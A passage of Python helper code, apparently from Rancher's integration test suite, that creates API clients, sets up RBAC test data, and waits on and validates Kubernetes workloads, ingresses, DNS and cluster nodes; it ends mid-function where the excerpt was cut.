AWS_SUBNET = os.environ.get("AWS_SUBNET")
AWS_VPC = os.environ.get("AWS_VPC")
AWS_SG = os.environ.get("AWS_SG")
AWS_ZONE = os.environ.get("AWS_ZONE")
AWS_IAM_PROFILE = os.environ.get("AWS_IAM_PROFILE", "")
AWS_S3_BUCKET_NAME = os.environ.get("AWS_S3_BUCKET_NAME", "")
AWS_S3_BUCKET_FOLDER_NAME = os.environ.get("AWS_S3_BUCKET_FOLDER_NAME", "")
LINODE_ACCESSKEY = os.environ.get('RANCHER_LINODE_ACCESSKEY', "None")
NFS_SERVER_MOUNT_PATH = "/nfs"
TEST_RBAC = ast.literal_eval(os.environ.get('RANCHER_TEST_RBAC', "False"))
if_test_rbac = pytest.mark.skipif(TEST_RBAC is False,
reason='rbac tests are skipped')
TEST_ALL_SNAPSHOT = ast.literal_eval(
os.environ.get('RANCHER_TEST_ALL_SNAPSHOT', "False")
)
if_test_all_snapshot = \
pytest.mark.skipif(TEST_ALL_SNAPSHOT is False,
reason='Snapshots check tests are skipped')
DATA_SUBDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'resource')
# As of release 2.4 default rke scan profile is "rke-cis-1.4"
CIS_SCAN_PROFILE = os.environ.get('RANCHER_CIS_SCAN_PROFILE', "rke-cis-1.4")
# here are all supported roles for RBAC testing
CLUSTER_MEMBER = "cluster-member"
CLUSTER_OWNER = "cluster-owner"
PROJECT_MEMBER = "project-member"
PROJECT_OWNER = "project-owner"
PROJECT_READ_ONLY = "read-only"
rbac_data = {
"project": None,
"namespace": None,
"workload": None,
"p_unshared": None,
"ns_unshared": None,
"wl_unshared": None,
"users": {
CLUSTER_OWNER: {},
CLUSTER_MEMBER: {},
PROJECT_OWNER: {},
PROJECT_MEMBER: {},
PROJECT_READ_ONLY: {},
}
}
auth_rbac_data = {
"project": None,
"namespace": None,
"users": {}
}
# here are the global role templates used for
# testing globalRoleBinding and groupRoleBinding
TEMPLATE_MANAGE_CATALOG = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"*"
],
"resources": [
"catalogs",
"templates",
"templateversions"
]
}
],
"name": "gr-test-manage-catalog",
}
TEMPLATE_LIST_CLUSTER = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"get",
"list",
"watch"
],
"resources": [
"clusters"
]
}
],
"name": "gr-test-list-cluster",
}
# this is used when testing users from a auth provider
AUTH_PROVIDER = os.environ.get('RANCHER_AUTH_PROVIDER', "")
if AUTH_PROVIDER not in ["activeDirectory", "freeIpa", "openLdap", ""]:
pytest.fail("Invalid RANCHER_AUTH_PROVIDER. Please provide one of: "
"activeDirectory, freeIpa, or openLdap (case sensitive).")
NESTED_GROUP_ENABLED = ast.literal_eval(
os.environ.get('RANCHER_NESTED_GROUP_ENABLED', "False"))
# Admin Auth username and the shared password for all auth users
AUTH_USER_PASSWORD = os.environ.get('RANCHER_AUTH_USER_PASSWORD', "")
# the link to log in as an auth user
LOGIN_AS_AUTH_USER_URL = \
CATTLE_TEST_URL + "/v3-public/" \
+ AUTH_PROVIDER + "Providers/" \
+ AUTH_PROVIDER.lower() + "?action=login"
CATTLE_AUTH_PRINCIPAL_URL = CATTLE_TEST_URL + "/v3/principals?action=search"
# This is used for nested group when a third part Auth is enabled
nested_group = {
"auth_info": None,
"users": None,
"group_dic": None,
"groups": None
}
auth_requirements = not AUTH_PROVIDER or not AUTH_USER_PASSWORD
if_test_group_rbac = pytest.mark.skipif(
auth_requirements,
reason='Group RBAC tests are skipped.'
'Required AUTH env variables '
'have not been set.'
)
# -----------------------------------------------------------------------------
# global variables from test_create_ha.py
test_run_id = "test" + str(random.randint(10000, 99999))
RANCHER_HOSTNAME_PREFIX = os.environ.get("RANCHER_HOSTNAME_PREFIX",
test_run_id)
CERT_MANAGER_VERSION = os.environ.get("RANCHER_CERT_MANAGER_VERSION", "v1.0.1")
# -----------------------------------------------------------------------------
# this is used for testing rbac v2
test_rbac_v2 = os.environ.get("RANCHER_TEST_RBAC_V2", "False")
if_test_rbac_v2 = pytest.mark.skipif(test_rbac_v2 != "True",
reason='test for rbac v2 is skipped')
def is_windows(os_type=TEST_OS):
return os_type == "windows"
def get_cluster_client_for_token_v1(cluster_id, token):
url = CATTLE_TEST_URL + "/k8s/clusters/" + cluster_id + "/v1/schemas"
return rancher.Client(url=url, token=token, verify=False)
def get_admin_client():
return rancher.Client(url=CATTLE_API_URL, token=ADMIN_TOKEN, verify=False)
def get_user_client():
return rancher.Client(url=CATTLE_API_URL, token=USER_TOKEN, verify=False)
def get_client_for_token(token, url=CATTLE_API_URL):
return rancher.Client(url=url, token=token, verify=False)
def get_project_client_for_token(project, token):
p_url = project.links['self'] + '/schemas'
p_client = rancher.Client(url=p_url, token=token, verify=False)
return p_client
def get_cluster_client_for_token(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def up(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def wait_state(client, obj, state, timeout=DEFAULT_TIMEOUT):
wait_for(lambda: client.reload(obj).state == state, timeout)
return client.reload(obj)
def wait_for_condition(client, resource, check_function, fail_handler=None,
timeout=DEFAULT_TIMEOUT):
start = time.time()
resource = client.reload(resource)
while not check_function(resource):
if time.time() - start > timeout:
exceptionMsg = 'Timeout waiting for ' + resource.baseType + \
' to satisfy condition: ' + \
inspect.getsource(check_function)
if fail_handler:
exceptionMsg = exceptionMsg + fail_handler(resource)
raise Exception(exceptionMsg)
time.sleep(.5)
resource = client.reload(resource)
return resource
def get_setting_value_by_name(name):
settings_url = CATTLE_API_URL + "/settings/" + name
head = {'Authorization': 'Bearer ' + ADMIN_TOKEN}
response = requests.get(settings_url, verify=False, headers=head)
return response.json()["value"]
# Return value is negative if v1 < v2, zero if v1 == v2 and positive if v1 > v2
def compare_versions(v1, v2):
if tuple(map(int, (v1.split(".")))) > tuple(map(int, (v2.split(".")))):
return 1
elif tuple(map(int, (v1.split(".")))) < tuple(map(int, (v2.split(".")))):
return -1
else:
return 0
def create_project_and_ns(token, cluster, project_name=None, ns_name=None):
server_url = cluster.links['self'].split("/clusters")[0]
client = get_client_for_token(token, server_url)
p = create_project(client, cluster, project_name)
c_client = get_cluster_client_for_token(cluster, token)
ns = create_ns(c_client, cluster, p, ns_name)
return p, ns
def create_project(client, cluster, project_name=None):
if project_name is None:
project_name = random_name()
p = client.create_project(name=project_name,
clusterId=cluster.id)
time.sleep(5)
p = wait_until_available(client, p)
assert p.state == 'active'
return p
def create_project_with_pspt(client, cluster, pspt):
p = client.create_project(name=random_name(),
clusterId=cluster.id)
p = wait_until_available(client, p)
assert p.state == 'active'
return set_pspt_for_project(p, client, pspt)
def set_pspt_for_project(project, client, pspt):
project.setpodsecuritypolicytemplate(podSecurityPolicyTemplateId=pspt.id)
project = wait_until_available(client, project)
assert project.state == 'active'
return project
def create_ns(client, cluster, project, ns_name=None):
if ns_name is None:
ns_name = random_name()
ns = client.create_namespace(name=ns_name,
clusterId=cluster.id,
projectId=project.id)
wait_for_ns_to_become_active(client, ns)
ns = client.reload(ns)
assert ns.state == 'active'
return ns
def assign_members_to_cluster(client, user, cluster, role_template_id):
crtb = client.create_cluster_role_template_binding(
clusterId=cluster.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return crtb
def assign_members_to_project(client, user, project, role_template_id):
prtb = client.create_project_role_template_binding(
projectId=project.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return prtb
def change_member_role_in_cluster(client, user, crtb, role_template_id):
crtb = client.update(
crtb,
roleTemplateId=role_template_id,
userId=user.id)
return crtb
def change_member_role_in_project(client, user, prtb, role_template_id):
prtb = client.update(
prtb,
roleTemplateId=role_template_id,
userId=user.id)
return prtb
def create_kubeconfig(cluster, file_name=kube_fname):
generateKubeConfigOutput = cluster.generateKubeconfig()
print(generateKubeConfigOutput.config)
file = open(file_name, "w")
file.write(generateKubeConfigOutput.config)
file.close()
def validate_psp_error_worklaod(p_client, workload, error_message):
workload = wait_for_wl_transitioning(p_client, workload)
assert workload.state == "updating"
assert workload.transitioning == "error"
print(workload.transitioningMessage)
assert error_message in workload.transitioningMessage
def validate_all_workload_image_from_rancher(project_client, ns, pod_count=1,
ignore_pod_count=False,
deployment_list=None,
daemonset_list=None,
cronjob_list=None, job_list=None):
if cronjob_list is None:
cronjob_list = []
if daemonset_list is None:
daemonset_list = []
if deployment_list is None:
deployment_list = []
if job_list is None:
job_list = []
workload_list = deployment_list + daemonset_list + cronjob_list + job_list
wls = [dep.name for dep in project_client.list_workload(namespaceId=ns.id).data]
assert len(workload_list) == len(wls), \
"Expected {} workload(s) to be present in {} namespace " \
"but there were {}".format(len(workload_list), ns.name, len(wls))
for workload_name in workload_list:
workloads = project_client.list_workload(name=workload_name,
namespaceId=ns.id).data
assert len(workloads) == workload_list.count(workload_name), \
"Expected {} workload(s) to be present with name {} " \
"but there were {}".format(workload_list.count(workload_name),
workload_name, len(workloads))
for workload in workloads:
for container in workload.containers:
assert str(container.image).startswith("rancher/")
if workload_name in deployment_list:
validate_workload(project_client, workload, "deployment",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
deployment_list.remove(workload_name)
if workload_name in daemonset_list:
validate_workload(project_client, workload, "daemonSet",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
daemonset_list.remove(workload_name)
if workload_name in cronjob_list:
validate_workload(project_client, workload, "cronJob",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
cronjob_list.remove(workload_name)
if workload_name in job_list:
validate_workload(project_client, workload, "job",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
job_list.remove(workload_name)
# Final assertion to ensure all expected workloads have been validated
assert not deployment_list + daemonset_list + cronjob_list
def validate_workload(p_client, workload, type, ns_name, pod_count=1,
wait_for_cron_pods=60, ignore_pod_count=False):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
# For cronjob, wait for the first pod to get created after
# scheduled wait time
if type == "cronJob":
time.sleep(wait_for_cron_pods)
if ignore_pod_count:
pods = p_client.list_pod(workloadId=workload.id).data
else:
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
pods = p_client.list_pod(workloadId=workload.id).data
assert len(pods) == pod_count
for pod in pods:
if type == "job":
job_type = True
expected_status = "Succeeded"
else:
job_type = False
expected_status = "Running"
p = wait_for_pod_to_running(p_client, pod, job_type=job_type)
assert p["status"]["phase"] == expected_status
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
if type == "deployment" or type == "statefulSet":
assert wl_result["status"]["readyReplicas"] == len(pods)
if type == "daemonSet":
assert wl_result["status"]["currentNumberScheduled"] == len(pods)
if type == "cronJob":
assert len(wl_result["status"]["active"]) >= len(pods)
if type == "job":
assert wl_result["status"]["succeeded"] == len(pods)
def validate_workload_with_sidekicks(p_client, workload, type, ns_name,
pod_count=1):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
for pod in pods:
wait_for_pod_to_running(p_client, pod)
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
assert wl_result["status"]["readyReplicas"] == pod_count
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
execute_kubectl_cmd(get_pods)
pods_result = execute_kubectl_cmd(get_pods)
assert len(pods_result["items"]) == pod_count
for pod in pods_result["items"]:
assert pod["status"]["phase"] == "Running"
assert len(pod["status"]["containerStatuses"]) == 2
assert "running" in pod["status"]["containerStatuses"][0]["state"]
assert "running" in pod["status"]["containerStatuses"][1]["state"]
def validate_workload_paused(p_client, workload, expectedstatus):
workloadStatus = p_client.list_workload(uuid=workload.uuid).data[0].paused
assert workloadStatus == expectedstatus
def validate_pod_images(expectedimage, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for pod in pods["items"]:
assert pod["spec"]["containers"][0]["image"] == expectedimage
def validate_pods_are_running_by_id(expectedpods, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
curpodnames = []
for pod in pods["items"]:
curpodnames.append(pod["metadata"]["name"])
for expectedpod in expectedpods["items"]:
assert expectedpod["metadata"]["name"] in curpodnames
def validate_workload_image(client, workload, expectedImage, ns):
workload = client.list_workload(uuid=workload.uuid).data[0]
assert workload.containers[0].image == expectedImage
validate_pod_images(expectedImage, workload, ns.name)
def execute_kubectl_cmd(cmd, json_out=True, stderr=False,
kubeconfig=kube_fname):
command = 'kubectl --kubeconfig {0} {1}'.format(
kubeconfig, cmd)
if json_out:
command += ' -o json'
print("run cmd: \t{0}".format(command))
if stderr:
result = run_command_with_stderr(command, False)
else:
result = run_command(command, False)
print("returns: \t{0}".format(result))
if json_out:
result = json.loads(result)
return result
def run_command(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
return subprocess.check_output(command, shell=True, text=True)
except subprocess.CalledProcessError as e:
return None
def run_command_with_stderr(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
output = subprocess.check_output(command, shell=True,
stderr=subprocess.PIPE)
returncode = 0
except subprocess.CalledProcessError as e:
output = e.stderr
returncode = e.returncode
if log_out:
print("return code: \t{0}".format(returncode))
if returncode != 0:
print("output: \t{0}".format(output))
return output
def wait_for_wl_to_active(client, workload, timeout=DEFAULT_TIMEOUT):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_ingress_to_active(client, ingress, timeout=DEFAULT_TIMEOUT):
start = time.time()
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
return wl
def wait_for_wl_transitioning(client, workload, timeout=DEFAULT_TIMEOUT,
state="error"):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.transitioning != state:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_pod_to_running(client, pod, timeout=DEFAULT_TIMEOUT, job_type=False):
start = time.time()
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
if job_type:
expected_state = "succeeded"
else:
expected_state = "running"
while p.state != expected_state :
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
return p
def get_schedulable_nodes(cluster, client=None, os_type=TEST_OS):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
schedulable_nodes = []
for node in nodes:
if node.worker and (not node.unschedulable):
for key, val in node.labels.items():
# Either one of the labels should be present on the node
if key == 'kubernetes.io/os' or key == 'beta.kubernetes.io/os':
if val == os_type:
schedulable_nodes.append(node)
break
# Including master in list of nodes as master is also schedulable
if ('k3s' in cluster.version["gitVersion"] or 'rke2' in cluster.version["gitVersion"]) and node.controlPlane:
schedulable_nodes.append(node)
return schedulable_nodes
def get_etcd_nodes(cluster, client=None):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
etcd_nodes = []
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
return etcd_nodes
def get_role_nodes(cluster, role, client=None):
etcd_nodes = []
control_nodes = []
worker_nodes = []
node_list = []
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
if node.controlPlane:
control_nodes.append(node)
if node.worker:
worker_nodes.append(node)
if role == "etcd":
node_list = etcd_nodes
if role == "control":
node_list = control_nodes
if role == "worker":
node_list = worker_nodes
return node_list
def validate_ingress(p_client, cluster, workloads, host, path,
insecure_redirect=False):
time.sleep(10)
curl_args = " "
if (insecure_redirect):
curl_args = " -L --insecure "
if len(host) > 0:
curl_args += " --header 'Host: " + host + "'"
nodes = get_schedulable_nodes(cluster, os_type="linux")
target_name_list = get_target_names(p_client, workloads)
for node in nodes:
host_ip = resolve_node_ip(node)
url = "http://" + host_ip + path
if not insecure_redirect:
wait_until_ok(url, timeout=300, headers={
"Host": host
})
cmd = curl_args + " " + url
validate_http_response(cmd, target_name_list)
def validate_ingress_using_endpoint(p_client, ingress, workloads,
timeout=300,
certcheck=False, is_insecure=False):
target_name_list = get_target_names(p_client, workloads)
start = time.time()
fqdn_available = False
url = None
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
ingress_list = p_client.list_ingress(uuid=ingress.uuid).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
if public_endpoint["hostname"].startswith(ingress.name) \
or certcheck:
fqdn_available = True
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
if "path" in public_endpoint.keys():
url += public_endpoint["path"]
time.sleep(10)
validate_http_response(url, target_name_list, insecure=is_insecure)
def get_target_names(p_client, workloads):
pods = []
for workload in workloads:
pod_list = p_client.list_pod(workloadId=workload.id).data
pods.extend(pod_list)
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
return target_name_list
def get_endpoint_url_for_workload(p_client, workload, timeout=600):
fqdn_available = False
url = ""
start = time.time()
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
workload_list = p_client.list_workload(uuid=workload.uuid).data
assert len(workload_list) == 1
workload = workload_list[0]
if hasattr(workload, 'publicEndpoints'):
assert len(workload.publicEndpoints) > 0
url = "http://"
url = url + workload.publicEndpoints[0]["addresses"][0] + ":"
url = url + str(workload.publicEndpoints[0]["port"])
fqdn_available = True
return url
def wait_until_lb_is_active(url, timeout=300):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for LB to become active')
return
def check_for_no_access(url, verify=False):
try:
requests.get(url, verify=verify)
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return True
def wait_until_active(url, timeout=120):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for url '
'to become active')
return
def wait_until_ok(url, timeout=120, headers={}):
start = time.time()
while not check_if_ok(url, headers=headers):
time.sleep(.5)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for {0} to become ok'.format(url)
)
return
def wait_for_status_code(url, expected_code=200, timeout=DEFAULT_TIMEOUT):
start = time.time()
r = requests.get(url, verify=False)
while r.status_code != expected_code:
time.sleep(1)
r = requests.get(url, verify=False)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for status code {0}'
', actual code {1}'.format(
expected_code, r.status_code
)
)
return
def check_if_ok(url, verify=False, headers={}):
try:
res = requests.head(url, verify=verify, headers=headers)
if res.status_code == 200:
return True
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return False
def validate_http_response(cmd, target_name_list, client_pod=None,
insecure=False):
if client_pod is None and cmd.startswith("http://"):
wait_until_active(cmd, 60)
target_hit_list = target_name_list[:]
count = 5 * len(target_name_list)
for i in range(1, count):
if len(target_hit_list) == 0:
break
if client_pod is None:
curl_cmd = "curl " + cmd
if insecure:
curl_cmd += "\t--insecure"
result = run_command(curl_cmd)
else:
if is_windows():
wget_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Invoke-WebRequest -UseBasicParsing -Uri ' \
'{0}).Content }}"'.format(cmd)
else:
wget_cmd = "wget -qO- " + cmd
result = kubectl_pod_exec(client_pod, wget_cmd)
result = result.decode()
if result is not None:
result = result.rstrip()
assert result in target_name_list
if result in target_hit_list:
target_hit_list.remove(result)
print("After removing all, the rest is: ", target_hit_list)
assert len(target_hit_list) == 0
def validate_cluster(client, cluster, intermediate_state="provisioning",
check_intermediate_state=True, skipIngresscheck=True,
nodes_not_in_active_state=[], k8s_version="",
userToken=USER_TOKEN, timeout=MACHINE_TIMEOUT):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster = validate_cluster_state(
client, cluster,
check_intermediate_state=check_intermediate_state,
intermediate_state=intermediate_state,
nodes_not_in_active_state=nodes_not_in_active_state,
timeout=timeout)
create_kubeconfig(cluster)
if k8s_version != "":
check_cluster_version(cluster, k8s_version)
if hasattr(cluster, 'rancherKubernetesEngineConfig'):
check_cluster_state(len(get_role_nodes(cluster, "etcd", client)))
# check all workloads under the system project are active
# wait for workloads to be active
# time.sleep(DEFAULT_TIMEOUT)
print("checking if workloads under the system project are active")
sys_project = client.list_project(name='System',
clusterId=cluster.id).data[0]
sys_p_client = get_project_client_for_token(sys_project, userToken)
for wl in sys_p_client.list_workload().data:
"""to help run KDM job faster (when there are many clusters),
timeout=300 is set"""
wait_for_wl_to_active(sys_p_client, wl, timeout=300)
# Create Daemon set workload and have an Ingress with Workload
# rule pointing to this daemonSet
project, ns = create_project_and_ns(userToken, cluster)
p_client = get_project_client_for_token(project, userToken)
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, workload, "daemonSet", ns.name,
len(get_schedulable_nodes(cluster, client)))
if not skipIngresscheck:
pods = p_client.list_pod(workloadId=workload["id"]).data
scale = len(pods)
# test service discovery
validate_service_discovery(workload, scale, p_client, ns, pods)
host = "test" + str(random_int(10000, 99999)) + ".com"
path = "/name.html"
rule = {"host": host,
"paths":
[{"workloadIds": [workload.id],
"targetPort": TEST_IMAGE_PORT}]}
ingress = p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
wait_for_ingress_to_active(p_client, ingress)
validate_ingress(p_client, cluster, [workload], host, path)
return cluster
def check_cluster_version(cluster, version):
cluster_k8s_version = \
cluster.appliedSpec["rancherKubernetesEngineConfig"][
"kubernetesVersion"]
assert cluster_k8s_version == version, \
"cluster_k8s_version: " + cluster_k8s_version + \
" Expected: " + version
expected_k8s_version = version[:version.find("-rancher")]
k8s_version = execute_kubectl_cmd("version")
kubectl_k8s_version = k8s_version["serverVersion"]["gitVersion"]
assert kubectl_k8s_version == expected_k8s_version, \
"kubectl version: " + kubectl_k8s_version + \
" Expected: " + expected_k8s_version
def check_cluster_state(etcd_count):
css_resp = execute_kubectl_cmd("get cs")
css = css_resp["items"]
components = ["scheduler", "controller-manager"]
for i in range(0, etcd_count):
components.append("etcd-" + str(i))
print("components to check - " + str(components))
for cs in css:
component_name = cs["metadata"]["name"]
assert component_name in components
components.remove(component_name)
assert cs["conditions"][0]["status"] == "True"
assert cs["conditions"][0]["type"] == "Healthy"
assert len(components) == 0
def validate_dns_record(pod, record, expected, port=TEST_IMAGE_PORT):
# requires pod with `dig` available - TEST_IMAGE
host = '{0}.{1}.svc.cluster.local'.format(
record["name"], record["namespaceId"])
validate_dns_entry(pod, host, expected, port=port)
def validate_dns_entry(pod, host, expected, port=TEST_IMAGE_PORT):
if is_windows():
validate_dns_entry_windows(pod, host, expected)
return
# requires pod with `dig` available - TEST_IMAGE
if HARDENED_CLUSTER:
cmd = 'curl -vs {}:{} 2>&1'.format(host, port)
else:
cmd = 'ping -c 1 -W 1 {0}'.format(host)
cmd_output = kubectl_pod_exec(pod, cmd)
connectivity_validation_pass = False
for expected_value in expected:
if expected_value in str(cmd_output):
connectivity_validation_pass = True
break
assert connectivity_validation_pass is True
if HARDENED_CLUSTER:
assert " 200 OK" in str(cmd_output)
else:
assert " 0% packet loss" in str(cmd_output)
dig_cmd = 'dig {0} +short'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
for expected_value in expected:
assert expected_value in str(dig_output)
def validate_dns_entry_windows(pod, host, expected):
def ping_check():
ping_cmd = 'ping -w 1 -n 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, ping_cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
return ping_validation_pass and (" (0% loss)" in str(ping_output))
wait_for(callback=ping_check,
timeout_message="Failed to ping {0}".format(host))
def dig_check():
dig_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Resolve-DnsName {0}).IPAddress }}"'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
dig_validation_pass = True
for expected_value in expected:
if expected_value not in str(dig_output):
dig_validation_pass = False
break
return dig_validation_pass
wait_for(callback=dig_check,
timeout_message="Failed to resolve {0}".format(host))
def validate_dns_record_deleted(client, dns_record, timeout=DEFAULT_TIMEOUT):
"""
Checks whether dns_record got deleted successfully.
Validates if dns_record is null in for current object client.
@param client: Object client use to create dns_record
@param dns_record: record object subjected to be deleted
@param timeout: Max time to keep checking whether record is deleted or not
"""
time.sleep(2)
start = time.time()
records = client.list_dns_record(name=dns_record.name, ).data
while len(records) != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for record {} to be deleted"
"".format(dns_record.name))
time.sleep(.5)
records = client.list_dns_record(name=dns_record.name, ).data
def wait_for_nodes_to_become_active(client, cluster, exception_list=[],
retry_count=0):
nodes = client.list_node(clusterId=cluster.id).data
node_auto_deleted = False
for node in nodes:
if node.requestedHostname not in exception_list:
node = wait_for_node_status(client, node, "active")
if node is None:
print("Need to re-evalauate new node list")
node_auto_deleted = True
retry_count += 1
print("Retry Count:" + str(retry_count))
if node_auto_deleted and retry_count < 5:
wait_for_nodes_to_become_active(client, cluster, exception_list,
retry_count)
def wait_for_node_status(client, node, state):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
# Handle the case of nodes getting auto deleted when they are part of
# nodepools
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
while node_status != state:
if time.time() - start > MACHINE_TIMEOUT:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
return node
def wait_for_node_to_be_deleted(client, node, timeout=300):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
while node_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for node delete")
time.sleep(.5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
def wait_for_cluster_node_count(client, cluster, expected_node_count,
timeout=300):
start = time.time()
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
while node_count != expected_node_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
def get_custom_host_registration_cmd(client, cluster, roles, node):
allowed_roles = ["etcd", "worker", "controlplane"]
cluster_tokens = client.list_cluster_registration_token(
clusterId=cluster.id).data
if len(cluster_tokens) > 0:
cluster_token = cluster_tokens[0]
else:
cluster_token = create_custom_host_registration_token(client, cluster)
additional_options = " --address " + node.public_ip_address + \
" --internal-address " + node.private_ip_address
if 'Administrator' == node.ssh_user:
cmd = cluster_token.windowsNodeCommand
cmd = cmd.replace('| iex', '--worker' + additional_options + ' | iex ')
else:
cmd = cluster_token.nodeCommand
for role in roles:
assert role in allowed_roles
cmd += " --" + role
cmd += additional_options
return cmd
def create_custom_host_registration_token(client, cluster):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster_token = client.create_cluster_registration_token(
clusterId=cluster.id)
cluster_token = client.wait_success(cluster_token)
assert cluster_token.state == 'active'
return cluster_token
def get_cluster_by_name(client, name):
clusters = client.list_cluster(name=name).data
assert len(clusters) == 1, "Cluster " + name + " does not exist"
return clusters[0]
def get_cluster_type(client, cluster):
cluster_configs = [
"amazonElasticContainerServiceConfig",
"azureKubernetesServiceConfig",
"googleKubernetesEngineConfig",
"rancherKubernetesEngineConfig"
]
if "rancherKubernetesEngineConfig" in cluster:
nodes = client.list_node(clusterId=cluster.id).data
if len(nodes) > 0:
if nodes[0].nodeTemplateId is None:
return "Custom"
for cluster_config in cluster_configs:
if cluster_config in cluster:
return cluster_config
return "Imported"
def delete_cluster(client, cluster):
nodes = client.list_node(clusterId=cluster.id).data
# Delete nodes(in cluster) from AWS for Imported and Custom Cluster
if len(nodes) > 0:
cluster_type = get_cluster_type(client, cluster)
print(cluster_type)
if get_cluster_type(client, cluster) in ["Imported", "Custom"]:
filters = [
{'Name': 'tag:Name',
'Values': ['testcustom*', 'teststress*', 'testsa*']}]
ip_filter = {}
ip_list = []
ip_filter['Name'] = \
'network-interface.addresses.association.public-ip'
